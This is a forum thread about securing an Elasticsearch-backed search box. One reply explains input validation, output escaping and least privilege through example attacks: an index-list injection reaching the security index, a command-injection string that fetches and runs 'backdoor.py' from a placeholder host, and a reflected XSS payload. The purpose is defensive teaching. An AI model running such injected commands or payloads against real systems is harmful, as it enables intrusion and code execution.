Should I escape or validate query terms before using the es client?

Fernando_Cesar · May 27, 2019, 10:20pm

Hy,
I'm trying out ES with a simple project. A web page with a search box (i.e., like Google) and a backend ES client sending the query terms to the search engine.

So I receive "XPTO" from the web form, and I use the ES client to query the index. I'm using the simplified query format.

Although "you shall validate the input" is the rule, I'm thinking I don't have to, because "XPTO" will be the input to the query, so the ES client should do the validation. Besides, my knowledge of ES is limited (as everyone else's), so ES would really be the one doing this kind of validation and escaping (if necessary).

Even if I change the analyzer, and allow more symbols that the standard one, I would not know what do escape. How would I do that?

I'm thinking also I should validade ES response, before showing it in the web page and escaping it for HTML and Javascript.

Am I missing some security concern here?
Thanks for your thoughts (and messages).

ikakavas · May 28, 2019, 5:40am

Short answer: Yes, you should probably do both input validation and output sanitization.

Input Validation

You should always assume there will be malicious users. The payload won't always by "XPTO". Depending on what client you use and how you use the user input in order to build your queries, there are attack vectors that can be dangerous. In the simplistic case that you want to allow access only to cesar_* indices, and that your web app takes the user input (i.e. "xpto") and uses this to feed to curl and make the request to get all documents of the cesar_xpto index

curl -uelastic:password -X GET "localhost:9200/index_{}/_search"

, the command will become

curl -uelastic:password  -X GET "localhost:9200/index_xpto/_search"

What happens if the user specifies xpto,.security as the input ? The request then becomes

curl -uelastic:password -X GET "localhost:9200/cesar_xpto,.security/_search"

and the user gets access to the documents of the internal security index. As said this is a very simplistic example and in this case a more interesting attack vector would be command injection ( i.e. an attacker using " && wget http://a.b.com/backdoor.py && chmod +x backdoor.py && ./backdoor.py as input ) but I just wanted to illustrate a possibility.

If you use i.e. the Java high level rest client to build your queries, you'll be much safer from injection attacks in the ES layer but your application might still be susceptible to other attack types. Also, you should think about DoS attacks where users might be able to run multiple consecutive expensive queries, causing CPU/memory starvation in your ES Cluster.

Output Sanitization

Elasticsearch will return JSON responses (i.e. with the HTTP Response header content-type: application/json; charset=UTF-8). That means that even if ES returns (reflects) back portions of the query - which it does in cases of an error - there is no danger for reflected XSS as there is no way the browser will interpret this as html. However, if you take the response and present it to the user in the context of a web app, then things change. For instance:

curl -uelastic:password  -X GET 'localhost:9200/something<img%20src=x%20onerror=alert(1))>'

will get the following response from Elasticsearch

{"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"}],"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"},"status":404}

Now if you take this and put it as is in the response page of your web app without escaping it, the <img src=x onerror=alert(1))> part will trigger and will be executed in the user's browser. Again, just an example.

Least Privilege Principle

Another thing worth noting is that you should not run all the queries as a superuser( i.e. the elastic user) . Figure out the least privileges your users will need and create a role that has these privileges, assign the role to a service account user and use that to make the requests to Elasticsearch via the client. This way, even if a user finds a way to trick your application logic, the impact that it can have on your elasticsearch cluster will be contained.

Hope this helps

Fernando_Cesar · May 28, 2019, 9:27am

Hy ikakavas! Thanks for the detailed answer!

In fact I'm using the high level Python client : https://elasticsearch-dsl.readthedocs.io/en/latest/

But I think I face the same concerns as with the Java one.

So, the next logic question is: what should I escape, as I didn't find documentation about that in the client's doc. The DOS attack is easier to deal with as is not ES specific. However, escaping is. And how would that change if I change the default analyzer(allowing some special characters in the database and in the queries)? Is there some guidelines or documentation about input validation, or escaping I could follow?

Thanks in advance.

Fernando_Cesar · June 2, 2019, 12:47am

Anyone knows about this documentation?

Fernando_Cesar · June 6, 2019, 11:17pm

Or does it depend on the analyzer?

Fernando_Cesar · June 21, 2019, 6:41pm

Bump

system · July 19, 2019, 6:41pm

This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.

Topic		Replies	Views
NoSQL Injection Elasticsearch	3	8335	July 5, 2017
Santizing query-strings Elasticsearch	3	421	July 6, 2017
User friendly/google-like queries Elasticsearch	3	550	July 6, 2017
Escaping user input for search queries Elasticsearch	5	630	August 18, 2019
Protection against cross scripting attacks (xss) in Elastic Search server? Elasticsearch	6	3176	July 6, 2017

Should I escape or validate query terms before using the es client?

Input Validation

Output Sanitization

Least Privilege Principle

Related topics